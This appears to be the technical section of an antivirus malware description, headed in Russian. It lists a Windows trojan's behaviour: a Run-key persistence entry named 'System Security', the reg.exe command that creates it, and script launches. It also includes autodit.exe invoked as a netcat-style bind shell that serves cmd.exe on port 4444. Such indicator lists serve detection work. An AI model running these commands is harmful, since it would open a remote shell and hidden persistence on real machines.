Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'System Security' = '"<SYSTEM32>\adset.vbs"'
- <SYSTEM32>\autodit.exe -l -p 4444 -e cmd.exe -L
- <SYSTEM32>\reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v System" "Security /d \"<SYSTEM32>\adset.vbs\"
- <SYSTEM32>\ipconfig.exe
- <SYSTEM32>\wscript.exe "<SYSTEM32>\adset.vbs"
- <SYSTEM32>\cmd.exe /c ""<SYSTEM32>\contry.bat" "
- <SYSTEM32>\adset.vbs
- <SYSTEM32>\contry.bat
- <SYSTEM32>\autodit.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''